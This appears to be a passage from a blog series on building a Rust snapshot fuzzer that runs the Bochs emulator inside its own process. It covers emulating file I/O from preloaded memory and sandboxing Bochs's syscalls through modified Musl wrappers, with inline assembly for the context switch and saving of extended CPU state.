mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bad000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bab000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baa000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
munmap(0x7fd071ba5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba3000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9e000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9d000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9b000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
munmap(0x7fd071b99000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b97000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b96000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
munmap(0x7fd071b94000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
...

File I/O

With the MMU out of the way, we needed a way to do file input and output. Bochs is trying to open its configuration file:

open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
close(3)                                = 0
writev(2, [{iov_base="00000000000i[      ] ", iov_len=21}, {iov_base=NULL, iov_len=0}], 200000000000i[      ] ) = 21
writev(2, [{iov_base="reading configuration from .boch"..., iov_len=36}, {iov_base=NULL, iov_len=0}], 2reading configuration from .bochsrc
) = 36
open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
read(3, "# You may now use double quotes "..., 1024) = 1024
read(3, "================================"..., 1024) = 1024
read(3, "ig_interface: win32config\n#confi"..., 1024) = 1024
read(3, "ace to AT&T's VNC viewer, cross "..., 1024) = 1024

The way I’ve approached this for now is to pre-read and store the contents of required files in memory when I initialize the Bochs execution context. This has some advantages, because I can imagine a future when we’re fuzzing something and Bochs needs to do file I/O on a disk image file or something else, and it’d be nice to just already have that file read into memory and waiting for usage. Emulating the file I/O syscalls then becomes very straightforward, we really only need to keep a few metadata and the file contents themselves:

#[derive(Clone)]
pub struct FileTable {
    files: Vec<File>,
}

impl FileTable {
    // We will attempt to open and read all of our required files ahead of time
    pub fn new() -> Result<Self, LucidErr> {
        // Retrieve .bochsrc
        let args: Vec<String> = std::env::args().collect();

        // Check to see if we have a "--bochsrc-path" argument
        if args.len() < 3 || !args.contains(&"--bochsrc-path".to_string()) {
            return Err(LucidErr::from("No `--bochsrc-path` argument"));
        }

        // Search for the value
        let mut bochsrc = None;
        for (i, arg) in args.iter().enumerate() {
            if arg == "--bochsrc-path" {
                if i >= args.len() - 1 {
                    return Err(
                        LucidErr::from("Invalid `--bochsrc-path` value"));
                }
            
                bochsrc = Some(args[i + 1].clone());
                break;
            }
        }

        if bochsrc.is_none() { return Err(
            LucidErr::from("No `--bochsrc-path` value provided")); }
        let bochsrc = bochsrc.unwrap();

        // Try to read the file
        let Ok(data) = read(&bochsrc) else { 
            return Err(LucidErr::from(
                &format!("Unable to read data BLEGH from '{}'", bochsrc)));
        };

        // Create a file now for .bochsrc
        let bochsrc_file = File {
            fd: 3,
            path: ".bochsrc".to_string(),
            contents: data.clone(),
            cursor: 0,
        };

        // Insert the file into the FileTable
        Ok(FileTable {
            files: vec![bochsrc_file],
        })
    }

    // Attempt to open a file
    pub fn open(&mut self, path: &str) -> Result<i32, ()> {
        // Try to find the requested path
        for file in self.files.iter() {
            if file.path == path {
                return Ok(file.fd);
            }
        }

        // We didn't find the file, this really should never happen?
        Err(())
    }

    // Look a file up by fd and then return a mutable reference to it
    pub fn get_file(&mut self, fd: i32) -> Option<&mut File> {
        self.files.iter_mut().find(|file| file.fd == fd)
    }
}

#[derive(Clone)]
pub struct File {
    pub fd: i32,            // The file-descriptor Bochs has for this file
    pub path: String,       // The file-path for this file
    pub contents: Vec<u8>,  // The actual file contents
    pub cursor: usize,      // The current cursor in the file
}

So when Bochs asks to read a file and provides the fd, we just check the FileTable for the correct file and then read its contents from the File::contents buffer and then update the cursor struct member to keep track of where in the file our current offset is.

// read
        0x0 => {
            // Check to make sure we have the requested file-descriptor
            let Some(file) = context.files.get_file(a1 as i32) else {
                println!("Non-existent file fd: {}", a1);
                fault!(contextp, Fault::NoFile);
            };

            // Now we need to make sure the buffer passed to read isn't NULL
            let buf_p = a2 as *mut u8;
            if buf_p.is_null() {
                context.tls.errno = libc::EINVAL;
                return -1_i64 as u64;
            }

            // Adjust read size if necessary
            let length = std::cmp::min(a3, file.contents.len() - file.cursor);

            // Copy the contents over to the buffer
            unsafe { 
                std::ptr::copy(
                    file.contents.as_ptr().add(file.cursor),    // src
                    buf_p,                                      // dst
                    length);                                    // len
            }

            // Adjust the file cursor
            file.cursor += length;

            // Success
            length as u64
        },

open calls are basically just handled as sanity checks at this point to make sure we know what Bochs is trying to access:

// open
        0x2 => {
            // Get pointer to path string we're trying to open
            let path_p = a1 as *const libc::c_char;

            // Make sure it's not NULL
            if path_p.is_null() {
                fault!(contextp, Fault::NullPath);
            }            

            // Create c_str from pointer
            let c_str = unsafe { std::ffi::CStr::from_ptr(path_p) };

            // Create Rust str from c_str
            let Ok(path_str) = c_str.to_str() else {
                fault!(contextp, Fault::InvalidPathStr);
            };

            // Validate permissions
            if a2 as i32 != 32768 {
                println!("Unhandled file permissions: {}", a2);
                fault!(contextp, Fault::Syscall);
            }

            // Open the file
            let fd = context.files.open(path_str);
            if fd.is_err() {
                println!("Non-existent file path: {}", path_str);
                fault!(contextp, Fault::NoFile);
            }

            // Success
            fd.unwrap() as u64
        },

// Attempt to open a file
    pub fn open(&mut self, path: &str) -> Result<i32, ()> {
        // Try to find the requested path
        for file in self.files.iter() {
            if file.path == path {
                return Ok(file.fd);
            }
        }

        // We didn't find the file
        Err(())
    }

And that’s really the whole of file I/O right now. Down the line, we’ll need to keep these in mind when we’re doing snapshots and resetting snapshots because the file state will need to be restored differentially, but this is a problem for another day.

Conclusion

The work continues on the fuzzer, I’m still having a blast implementing it, special thanks to everyone mentioned in the repository for their help! Next, we’ll have to pick a fuzzing target and it get it running in Bochs. We’ll have to lobotomize the system Bochs is emulating so that it runs our target program such that we can snapshot and fuzz appropriately, that should be really fun, until then!

Fuzzer Development 2: Sandboxing Syscalls

The Human Machine Interface

h0mbre

17 February 2024 at 05:00

Introduction

If you haven’t heard, we’re developing a fuzzer on the blog these days. I don’t even know if “fuzzer” is the right word for what we’re building, it’s almost more like an execution engine that will expose hooks? Anyways, if you missed the first episode you can catch up here. We are creating a fuzzer that loads a statically built Bochs emulator into itself, and executes Bochs logic while maintaining a sandbox for Bochs. You can think of it as, we were too lazy to implement our own x86_64 emulator from scratch so we’ve just literally taken a complete emulator and stuffed it into our own process to use it. The fuzzer is written in Rust and Bochs is a C++ codebase. Bochs is a full system emulator, so the devices and everything else is just simulated in software. This is great for us because we can simply snapshot and restore Bochs itself to achieve snapshot fuzzing of our target. So the fuzzer runs Bochs and Bochs runs our target. This allows us to snapshot fuzz arbitrarily complex targets: web browsers, kernels, network stacks, etc. This episode, we’ll delve into the concept of sandboxing Bochs from syscalls. We do not want Bochs to be capable of escaping its sandbox or retrieving any data from outside of our environment. So today we’ll get into the implementation details of my first stab at Bochs-to-fuzzer context switching to handle syscalls. In the future we will also need to implement context switching from fuzzer-to-Bochs as well, but for now let’s focus on syscalls.

This fuzzer was conceived of and implemented originally by Brandon Falk.

There will be no repo changes with this post.

Syscalls

Syscalls are a way for userland to voluntarily context switch to kernel-mode in order to utilize some kernel provided utility or function. Context switching simply means changing the context in which code is executing. When you’re adding integers, reading/writing memory, your process is executing in user-mode within your processes’ virtual address space. But if you want to open a socket or file, you need the kernel’s help. To do this, you make a syscall which will tell the processor to switch execution modes from user-mode to kernel-mode. In order to leave user-mode go to kernel-mode and then return to user-mode, a lot of care must be taken to accurately save the execution state at every step. Once you try to execute a syscall, the first thing the OS has to do is save your current execution state before it starts executing your requested kernel code, that way once the kernel is done with your request, it can return gracefully to executing your user-mode process.

Context-switching can be thought of as switching from executing one process to another. In our case, we’re switching from Bochs execution to Lucid execution. Bochs is doing it’s thing, reading/writing memory, doing arithmetic etc, but when it needs the kernel’s help it attempts to make a syscall. When this occurs we need to:

recognize that Bochs is trying to syscall, this isn’t always easy to do weirdly
intercept execution and redirect to the appropriate code path
save Bochs’ execution state
execute our Lucid logic in place of the kernel, think of Lucid as Bochs’ kernel
return gracefully to Bochs by restoring its state

C Library

Normally programmers don’t have to worry about making syscalls directly. They instead use functions that are defined and implemented in a C library instead, and its these functions that actually make the syscalls. You can think of these functions as wrappers around a syscall. For instance if you use the C library function for open, you’re not directly making a syscall, you’re calling into the library’s open function and that function is the one emitting a syscall instruction that actually peforms the context switch into the kernel. Doing things this way takes a lot of the portability work off of the programmer’s shoulders because the guts of the library functions perform all of the conditional checks for environmental variables and execute accordingly. Programmers just call the open function and don’t have to worry about things like syscall numbers, error handling, etc as those things are kept abstracted and uniform in the code exported to the programmer.

This provides a nice chokepoint for our purposes, since Bochs programmers also use C library functions instead of invoking syscalls directly. When Bochs wants to make a syscall, it’s going to call a C library function. This gives us an opportunity to intercept these syscalls before they are made. We can insert our own logic into these functions that check to see whether or not Bochs is executing under Lucid, if it is, we can insert logic that directs execution to Lucid instead of the kernel. In pseudocode we can achieve something like the following:

fn syscall()
  if lucid:
    lucid_syscall()
  else:
    normal_syscall()

Musl

Musl is a C library that is meant to be “lightweight.” This gives us some simplicity to work with vs. something like Glibc which is a monstrosity an affront to God. Importantly, Musl is reputationally great for static linking, which is what we need when we build our static PIE Bochs. So the idea here is that we can manually alter Musl code to change how syscall-invoking wrapper functions work so that we can hijack execution in a way that context-switches into Lucid rather than the kernel.

In this post we’ll be working with Musl 1.2.4 which is the latest version as of today.

Baby Steps

Instead of jumping straight into Bochs, we’ll be using a test program for the purposes of developing our first context-switching routines. This is just easier. The test program is this:

#include <stdio.h>
#include <unistd.h>
#include <lucid.h>

int main(int argc, char *argv[]) {
    printf("Argument count: %d\n", argc);
    printf("Args:\n");
    for (int i = 0; i < argc; i++) {
        printf("   -%s\n", argv[i]);
    }

    size_t iters = 0;
    while (1) {
        printf("Test alive!\n");
        sleep(1);
        iters++;

        if (iters == 5) { break; }
    }

    printf("g_lucid_ctx: %p\n", g_lucid_ctx);
}

The program will just tell us it’s argument count, each argument, live for ~5 seconds, and then print the memory address of a Lucid execution context data structure. This data structure will be allocated and initialized by Lucid if the program is running under Lucid, and it will be NULL otherwise. So how do we accomplish this?

Execution Context Tracking

Our problem is that we need a globally accessible way for the program we load (eventually Bochs) to tell whether or not its running under Lucid or running as normal. We also have to provide many data structures and function addresses to Bochs so we need a vehicle do that.

What I’ve done is I’ve just created my own header file and placed it in Musl called lucid.h. This file defines all of the Lucid-specific data structures we need Bochs to have access to when it’s compiled against Musl. So in the header file right now we’ve defined a lucid_ctx data structure, and we’ve also created a global instance of one called g_lucid_ctx:

// An execution context definition that we use to switch contexts between the
// fuzzer and Bochs. This should contain all of the information we need to track
// all of the mutable state between snapshots that we need such as file data.
// This has to be consistent with LucidContext in context.rs
typedef struct lucid_ctx {
    // This must always be the first member of this struct
    size_t exit_handler;
    int save_inst;
    size_t save_size;
    size_t lucid_save_area;
    size_t bochs_save_area;
    struct register_bank register_bank;
    size_t magic;
} lucid_ctx_t;

// Pointer to the global execution context, if running inside Lucid, this will
// point to the a struct lucid_ctx_t inside the Fuzzer 
lucid_ctx_t *g_lucid_ctx;

Program Start Under Lucid

So in Lucid’s main function right now we do the following:

Load Bochs
Create an execution context
Jump to Bochs’ entry point and start executing

When we jump to Bochs’ entry point, one of the earliest functions called is a function in Musl called _dlstart_c located in the source file dlstart.c. Right now, we create that global execution context in Lucid on the heap, and then we pass that address in arbitrarily chosen r15. This whole function will have to change eventually because we’ll want to context switch from Lucid to Bochs to perform this in the future, but for now this is all we do:

pub fn start_bochs(bochs: Bochs, context: Box<LucidContext>) {
    // rdx: we have to clear this register as the ABI specifies that exit
    // hooks are set when rdx is non-null at program start
    //
    // rax: arbitrarily used as a jump target to the program entry
    //
    // rsp: Rust does not allow you to use 'rsp' explicitly with in(), so we
    // have to manually set it with a `mov`
    //
    // r15: holds a pointer to the execution context, if this value is non-
    // null, then Bochs learns at start time that it is running under Lucid
    //
    // We don't really care about execution order as long as we specify clobbers
    // with out/lateout, that way the compiler doesn't allocate a register we 
    // then immediately clobber
    unsafe {
        asm!(
            "xor rdx, rdx",
            "mov rsp, {0}",
            "mov r15, {1}",
            "jmp rax",
            in(reg) bochs.rsp,
            in(reg) Box::into_raw(context),
            in("rax") bochs.entry,
            lateout("rax") _,   // Clobber (inout so no conflict with in)
            out("rdx") _,       // Clobber
            out("r15") _,       // Clobber
        );
    }
}

So when we jump to Bochs entry point having come from Lucid, r15 should hold the address of the execution context. In _dlstart_c, we can check r15 and act accordingly. Here are those additions I made to Musl’s start routine:

hidden void _dlstart_c(size_t *sp, size_t *dynv)
{
	// The start routine is handled in inline assembly in arch/x86_64/crt_arch.h
	// so we can just do this here. That function logic clobbers only a few
	// registers, so we can have the Lucid loader pass the address of the 
	// Lucid context in r15, this is obviously not the cleanest solution but
	// it works for our purposes
	size_t r15;
	__asm__ __volatile__(
		"mov %%r15, %0" : "=r"(r15)
	);

	// If r15 was not 0, set the global context address for the g_lucid_ctx that
	// is in the Rust fuzzer
	if (r15 != 0) {
		g_lucid_ctx = (lucid_ctx_t *)r15;

		// We have to make sure this is true, we rely on this
		if ((void *)g_lucid_ctx != (void *)&g_lucid_ctx->exit_handler) {
			__asm__ __volatile__("int3");
		}
	}

	// We didn't get a g_lucid_ctx, so we can just run normally
	else {
		g_lucid_ctx = (lucid_ctx_t *)0;
	}

When this function is called, r15 remains untouched by the earliest Musl logic. So we use inline assembly to extract the value into a variable called r15 and check it for data. If it has data, we set the global context variable to the address in r15; otherwise we explicitly set it to NULL and run as normal. Now with a global set, we can do runtime checks for our environment and optionally call into the real kernel or into Lucid.

Lobotomizing Musl Syscalls

Now with our global set, it’s time to edit the functions responsible for making syscalls. Musl is very well organized so finding the syscall invoking logic was not too difficult. For our target architecture, which is x86_64, those syscall invoking functions are in arch/x86_64/syscall_arch.h. They are organized by how many arguments the syscall takes:

static __inline long __syscall0(long n)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall1(long n, long a1)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall2(long n, long a1, long a2)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2)
						  : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall3(long n, long a1, long a2, long a3)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall4(long n, long a1, long a2, long a3, long a4)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10): "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall5(long n, long a1, long a2, long a3, long a4, long a5)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

For syscalls, there is a well defined calling convention. Syscalls take a “syscall number” which determines what syscall you want in eax, then the next n parameters are passed in via the registers in order: rdi, rsi, rdx, r10, r8, and r9.

This is pretty intuitive but the syntax is a bit mystifying, like for example on those __asm__ __volatile__ ("syscall" lines, it’s kind of hard to see what it’s doing. Let’s take the most convoluted function, __syscall6 and break down all the syntax. We can think of the assembly syntax as a format string like for printing, but this is for emitting code instead:

unsigned long ret is where we will store the result of the syscall to indicate whether or not it was a success. In the raw assembly, we can see that there is a : and then "=a(ret)", this first set of parameters after the initial colon is to indicate output parameters. We are saying please store the result in eax (symbolized in the syntax as a) into the variable ret.
The next series of params after the next colon are input parameters. "a"(n) is saying, place the function argument n, which is the syscall number, into eax which is symbolized again as a. Next is store a1 in rdi, which is symbolized as D, and so forth
Arguments 4-6 are placed in registers above, for instance the syntax register long r10 __asm__("r10") = a4; is a strong compiler hint to store a4 into r10. And then later we see "r"(r10) says input the variable r10 into a general purpose register (which is already satisfied).
The last set of colon-separated values are known as “clobbers”. These tell the compiler what our syscall is expected to corrupt. So the syscall calling convention specifies that rcx, r11, and memory may be overwritten by the kernel.

With the syntax explained, we see what is taking place. The job of these functions is to translate the function call into a syscall. The calling convention for functions, known as the System V ABI, is different from that of a syscall, the register utilization differs. So when we call __syscall6 and pass its arguments, each argument is stored in the following register:

n → rax
a1 → rdi
a2 → rsi
a3 → rdx
a4 → rcx
a5 → r8
a6 → r9

So the compiler will take those function args from the System V ABI and translate them into the syscall via the assembly that we explained above. So now these are the functions we need to edit so that we don’t emit that syscall instruction and instead call into Lucid.

Conditionally Calling Into Lucid

So we need a way in these function bodies to call into Lucid instead of emit syscall instructions. To do so we need to define our own calling convention, for now I’ve been using the following:

r15: contains the address of the global Lucid execution context
r14: contains an “exit reason” which is just an enum explaining why we are context switching
r13: is the base address of the register bank structure of the Lucid execution context, we need this memory section to store our register values to save our state when we context switch
r12: stores the address of the “exit handler” which is the function to call to context switch

This will no doubt change some as we add more features/functionality. I should also note that it is the functions responibility to preserve these values according to the ABI, so the function caller expects that these won’t change during a function call, well we are changing them. That’s ok because in the function where we use them, we are marking them as clobbers, remember? So the compiler is aware that they change, what the compiler is going to do now is before it executes any code, it’s going to push those registers onto the stack to save them, and then before exiting, pop them back into the registers so that the caller gets back the expected values. So we’re free to use them.

So to alter the functions, I changed the function logic to first check if we have a global Lucid execution context, if we do not, then execute the normal Musl function, you can see that here as I’ve moved the normal function logic out to a separate function called __syscall6_original:

static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8  __asm__("r8")  = a5;
	register long r9  __asm__("r9")  = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
							"r"(r8), "r"(r9) : "rcx", "r11", "memory");

	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }

However, if we are running under Lucid, I set up our calling convention by explicitly setting the registers r12-r15 in accordance to what we are expecting there when we context-switch to Lucid.

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
    if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
	
    register long ret;
    register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
    register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
    register long r14 __asm__("r14") = SYSCALL;
    register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);

Now with our calling convention set up, we can then use inline assembly as before. Notice we’ve replaced the syscall instruction with call r12, calling our exit handler as if it’s a normal function:

__asm__ __volatile__ (
        "mov %1, %%rax\n\t"
	"mov %2, %%rdi\n\t"
	"mov %3, %%rsi\n\t"
	"mov %4, %%rdx\n\t"
	"mov %5, %%r10\n\t"
	"mov %6, %%r8\n\t"
	"mov %7, %%r9\n\t"
        "call *%%r12\n\t"
        "mov %%rax, %0\n\t"
        : "=r" (ret)
        : "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
		  "r" (r12), "r" (r13), "r" (r14), "r" (r15)
        : "rax", "rcx", "r11", "memory"
    );
	
	return ret;

So now we’re calling the exit handler instead of syscalling into the kernel, and all of the registers are setup as if we’re syscalling. We’ve also got our calling convention registers set up. Let’s see what happens when we land on the exit handler, a function that is implemented in Rust inside Lucid. We are jumping from Bochs code directly to Lucid code!

Implementing a Context Switch

The first thing we need to do is create a function body for the exit handler. In Rust, we can make the function visible to Bochs (via our edited Musl) by declaring the function as an extern C function and giving it a label in inline assembly as such:

extern "C" { fn exit_handler(); }
global_asm!(
    ".global exit_handler",
    "exit_handler:",

So this function is what will be jumped to by Bochs when it tries to syscall under Lucid. The first thing we need to consider is that we need to keep track of Bochs’ state the way the kernel would upon entry to the context switching routine. The first thing we’ll want to save off is the general purpose registers. By doing this, we can preserve the state of the registers, but also unlock them for our own use. Since we save them first, we’re then free to use them. Remember that our calling convention uses r13 to store the base address of the execution context register bank:

#[repr(C)]
#[derive(Default, Clone)]
pub struct RegisterBank {
    pub rax:    usize,
    rbx:        usize,
    rcx:        usize,
    pub rdx:    usize,
    pub rsi:    usize,
    pub rdi:    usize,
    rbp:        usize,
    rsp:        usize,
    pub r8:     usize,
    pub r9:     usize,
    pub r10:    usize,
    r11:        usize,
    r12:        usize,
    r13:        usize,
    r14:        usize,
    r15:        usize,
}

We can save the register values then by doing this:

// Save the GPRS to memory
"mov [r13 + 0x0], rax",
"mov [r13 + 0x8], rbx",
"mov [r13 + 0x10], rcx",
"mov [r13 + 0x18], rdx",
"mov [r13 + 0x20], rsi",
"mov [r13 + 0x28], rdi",
"mov [r13 + 0x30], rbp",
"mov [r13 + 0x38], rsp",
"mov [r13 + 0x40], r8",
"mov [r13 + 0x48], r9",
"mov [r13 + 0x50], r10",
"mov [r13 + 0x58], r11",
"mov [r13 + 0x60], r12",
"mov [r13 + 0x68], r13",
"mov [r13 + 0x70], r14",
"mov [r13 + 0x78], r15",

This will save the register values to memory in the memory bank for preservation. Next, we’ll want to preserve the CPU’s flags, luckily there is a single instruction for this purpose which pushes the flag values to the stack called pushfq.

We’re using a pure assembly stub right now but we’d like to start using Rust at some point, that point is now. We have saved all the state we can for now, and it’s time to call into a real Rust function that will make programming and implementation easier. To call into a function though, we need to set up the register values to adhere to the function calling ABI remember. Two pieces of data that we want to be accessible are the execution context and the reason why we exited. Those are in r15 and r14 respectively remember. So we can simply place those into the registers used for passing function arguments and call into a Rust function called lucid_handler now.

// Save the CPU flags
"pushfq",

// Set up the function arguments for lucid_handler according to ABI
"mov rdi, r15", // Put the pointer to the context into RDI
"mov rsi, r14", // Put the exit reason into RSI

// At this point, we've been called into by Bochs, this should mean that 
// at the beginning of our exit_handler, rsp was only 8-byte aligned and
// thus, by ABI, we cannot legally call into a Rust function since to do so
// requires rsp to be 16-byte aligned. Luckily, `pushfq` just 16-byte
// aligned the stack for us and so we are free to `call`
"call lucid_handler",

So now, we are free to execute real Rust code! Here is lucid_handler as of now:

// This is where the actual logic is for handling the Bochs exit, we have to 
// use no_mangle here so that we can call it from the assembly blob. We need
// to see why we've exited and dispatch to the appropriate function
#[no_mangle]
fn lucid_handler(context: *mut LucidContext, exit_reason: i32) {
    // We have to make sure this bad boy isn't NULL 
    if context.is_null() {
        println!("LucidContext pointer was NULL");
        fatal_exit();
    }

    // Ensure that we have our magic value intact, if this is wrong, then we 
    // are in some kind of really bad state and just need to die
    let magic = LucidContext::ptr_to_magic(context);
    if magic != CTX_MAGIC {
        println!("Invalid LucidContext Magic value: 0x{:X}", magic);
        fatal_exit();
    }

    // Before we do anything else, save the extended state
    let save_inst = LucidContext::ptr_to_save_inst(context);
    if save_inst.is_err() {
        println!("Invalid Save Instruction");
        fatal_exit();
    }
    let save_inst = save_inst.unwrap();

    // Get the save area
    let save_area =
        LucidContext::ptr_to_save_area(context, SaveDirection::FromBochs);

    if save_area == 0 || save_area % 64 != 0 {
        println!("Invalid Save Area");
        fatal_exit();
    }

    // Determine save logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xsave to save the extended state to Bochs save area
            unsafe { _xsave64(save_area as *mut u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxsave to save the extended state to Bochs save area
            unsafe { _fxsave64(save_area as *mut u8); }
        },
        _ => (), // NoSave
    }

    // Try to convert the exit reason into BochsExit
    let exit_reason = BochsExit::try_from(exit_reason);
    if exit_reason.is_err() {
        println!("Invalid Bochs Exit Reason");
        fatal_exit();
    }
    let exit_reason = exit_reason.unwrap();
    
    // Determine what to do based on the exit reason
    match exit_reason {
        BochsExit::Syscall => {
            syscall_handler(context);
        },
    }

    // Restore extended state, determine restore logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }
}

There are a few important pieces here to discuss.

Extended State

Let’s start with this concept of the save area. What is that? Well, we already have a general purpose registers saved and our CPU flags, but there is what’s called an “extended state” of the processor that we haven’t saved. This can include the floating-point registers, vector registers, and other state information used by the processor to support advanced execution features like SIMD (Single Instruction, Multiple Data) instructions, encryption, and other stuff like control registers. Is this important? It’s hard to say, we don’t know wtf Bochs will do, it might count on these to be preserved across function calls so I thought we’d go ahead and do it.

To save this state, you just execute the appropriate saving instruction for your CPU. To do this somewhat dynamically at runtime, I just query the processor for at least two saving instructions to see if they’re available, if they’re not, for now, we don’t support anything else. So when we create the execution context initially, we determine what save instruction we’ll need and store that answer in the execution context. Then on a context switch, we can dynamically use the approriate extended state saving function. This works because we don’t use any of the extended state in lucid_handler yet so it’s preserved still. You can see how I checked during context initialization here:

pub fn new() -> Result<Self, LucidErr> {
        // Check for what kind of features are supported we check from most 
        // advanced to least
        let save_inst = if std::is_x86_feature_detected!("xsave") {
            SaveInst::XSave64
        } else if std::is_x86_feature_detected!("fxsr") {
            SaveInst::FxSave64
        } else {
            SaveInst::NoSave
        };

        // Get save area size
        let save_size: usize = match save_inst {
            SaveInst::NoSave => 0,
            _ => calc_save_size(),
        };

The way this works is the processor takes a pointer to memory where you want it saved and also how much you want saved, like what specific states. I just maxed out the amount of state I want saved and asked the CPU how much memory that would be:

// Standalone function to calculate the size of the save area for saving the 
// extended processor state based on the current processor's features. `cpuid` 
// will return the save area size based on the value of the XCR0 when ECX==0
// and EAX==0xD. The value returned to EBX is based on the current features
// enabled in XCR0, while the value returned in ECX is the largest size it
// could be based on CPU capabilities. So out of an abundance of caution we use
// the ECX value. We have to preserve EBX or rustc gets angry at us. We are
// assuming that the fuzzer and Bochs do not modify the XCR0 at any time.  
fn calc_save_size() -> usize {
    let save: usize;
    unsafe {
        asm!(
            "push rbx",
            "mov rax, 0xD",
            "xor rcx, rcx",
            "cpuid",
            "pop rbx",
            out("rax") _,       // Clobber
            out("rcx") save,    // Save the max size
            out("rdx") _,       // Clobbered by CPUID output (w eax)
        );
    }

    // Round up to the nearest page size
    (save + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)
}

